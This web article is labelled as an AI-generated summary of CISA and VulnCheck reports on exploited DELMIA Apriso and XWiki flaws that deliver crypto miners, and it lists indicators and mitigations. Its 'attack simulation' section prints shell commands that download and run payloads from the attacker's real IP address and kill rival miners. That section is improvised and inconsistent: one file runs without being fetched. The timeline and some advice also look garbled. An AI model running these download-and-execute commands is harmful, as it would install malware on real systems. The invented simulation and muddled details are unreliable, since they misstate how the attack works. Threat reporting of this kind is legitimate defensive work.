Skip to main content

On This Page
← AI News
AI News Cyber Security Software Vulnerabilities

Active Exploits Target Dassault Systèmes and XWiki Vulnerabilities, Delivering Crypto Miners

4 min read
Share

These articles are AI-generated summaries. Please check the original sources for full details.

Active Exploits Target Dassault Systèmes and XWiki Vulnerabilities, Delivering Crypto Miners

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and vulnerability researcher firm VulnCheck have confirmed that threat actors are actively exploiting critical security flaws in Dassault Systèmes DELMIA Apriso and XWiki, leveraging these vulnerabilities to deploy cryptocurrency miners. These exploits highlight the growing risk of unpatched software and the urgency of timely remediation.

Critical Vulnerabilities and Their Impact

Three major vulnerabilities have been identified, each with high CVSS scores and significant exploit potential:

  • CVE-2025-6204 (CVSS 8.0):

    • Nature: Code injection flaw in DELMIA Apriso (versions 2020–2025).
    • Impact: Allows attackers to execute arbitrary code on the system.
    • Patch: Addressed by Dassault Systèmes in early August 2025.

  • CVE-2025-6205 (CVSS 9.1):

    • Nature: Missing authorization check in DELMIA Apriso.
    • Impact: Enables attackers to gain privileged access.
    • Patch: Resolved in the same update as CVE-2025-6204.

  • CVE-2025-24893 (CVSS 9.8):

    • Nature: Eval injection vulnerability in XWiki via the /bin/get/Main/SolrSearch endpoint.
    • Impact: Allows any guest user to execute arbitrary remote code.
    • Exploitation Timeline:
      • First detected by VulnCheck on October 24, 2025.
      • Weaponized in real-world attacks as early as March 2025.

These vulnerabilities are now listed in CISA’s Known Exploited Vulnerabilities (KEV) catalog, emphasizing their criticality.

Exploitation Techniques and Attack Chains

Attackers are using these flaws in multi-stage exploit chains to compromise systems and deploy cryptocurrency miners:

  1. DELMIA Apriso Exploits (CVE-2025-6204/6205):

    • Exploit Chain:
      • Combine both flaws to create elevated privileges.
      • Drop executable files into web-served directories, enabling full application compromise.
    • Context: Follows a prior exploit (CVE-2025-5086) flagged by CISA in September 2025.

  2. XWiki Exploit (CVE-2025-24893):

    • Two-Stage Attack:

      • Stage 1: Write a downloader (x640) to disk via wget from IP 193.32.208[.]24:8080.
      • Stage 2: Execute the downloader to fetch and deploy payloads:
        • x521: Retrieves a cryptocurrency miner from 193.32.208[.]24:8080/rDuiQRKhs5/tcrond.
        • x522: Kills competing miners (e.g., XMRig, Kinsing) and launches the miner with c3pool.org configuration.

    • Attack Source:

      • IP 123.25.249[.]88 (Vietnam) flagged in AbuseIPDB for brute-force attacks.
      • Attackers use wget and shell commands to execute payloads.

Mitigation and Recommendations

  • Immediate Actions:

    • Apply patches for DELMIA Apriso (CVE-2025-6204/6205) and XWiki (CVE-2025-24893).
    • FCEB Agencies: Must remediate DELMIA Apriso flaws by November 18, 2025.

  • Monitoring and Defense:

    • Block traffic to suspicious IPs (e.g., 193.32.208[.]24, 123.25.249[.]88).
    • Monitor for unusual wget or shell command activity.
    • Use intrusion detection systems (IDS) to flag exploit patterns targeting /bin/get/Main/SolrSearch.

  • Best Practices:

    • Regularly update software and apply security patches promptly.
    • Restrict unauthorized access to critical endpoints (e.g., disable eval() in XWiki).
    • Conduct threat hunting for signs of cryptocurrency miner payloads (e.g., tcrond, c3pool.org).

Working Example (Attack Simulation)

While the full exploit code is not disclosed, a simplified simulation of the XWiki attack vector is shown below:

# Stage 1: Download malicious payload
wget http://193.32.208.24:8080/x640 -O /tmp/11909

# Stage 2: Execute the downloader
chmod +x /tmp/11909
/tmp/11909

# Payload execution (simplified)
wget http://193.32.208.24:8080/rDuiQRKhs5/tcrond -O /tmp/x521
chmod +x /tmp/x521
/tmp/x521

# Kill competing miners and launch c3pool miner
killall XMRig Kinsing
/tmp/x522

Note: This example is for educational purposes only. Real-world attacks may use obfuscation or encryption to avoid detection.

Recommendations

  • When to Use This Approach:

    • Apply patches immediately if your systems use DELMIA Apriso or XWiki.
    • Monitor for unusual network traffic or file modifications in /tmp directories.

  • What to Watch Out For:

    • Avoid using outdated software versions (e.g., DELMIA Apriso < 2025).
    • Do not execute untrusted scripts or files from unknown sources.
    • Regularly review logs for signs of remote code execution (RCE) attempts.

  • Real-World Application:

    • Organizations should prioritize patching systems exposed to the internet.
    • Integrate threat intelligence feeds (e.g., CISA KEV, AbuseIPDB) into security operations.

Reference: Active Exploits Hit Dassault and XWiki — CISA Confirms Critical Flaws Under Attack

Continue reading

Next article

AI's Transformative Role in GRC: Opportunities, Risks, and Strategic Insights from a Free Webinar

Related Content

Nov 5, 2025

CISA Adds Gladinet and CWP Vulnerabilities to KEV Catalog Amid Active Exploitation

CISA has added critical vulnerabilities in Gladinet, CWP, and WordPress plugins to its KEV catalog, emphasizing urgent patching due to active exploitation in the wild.

Read article
Nov 12, 2025

Microsoft Patches 63 Security Flaws, Including Critical Windows Kernel Zero-Day Under Active Attack

Microsoft patches 63 security flaws, including a critical Windows Kernel zero-day under active exploitation (CVE-2025-62215).

Read article
Nov 6, 2025

Cisco Warns of Critical Firewall Vulnerabilities Exploited in Zero-Day Attacks

Cisco has disclosed new firewall vulnerabilities (CVE-2025-20333 and CVE-2025-20362) exploited as zero-days, enabling denial-of-service attacks and unauthorized access. Learn about the risks and recommended mitigations.

Read article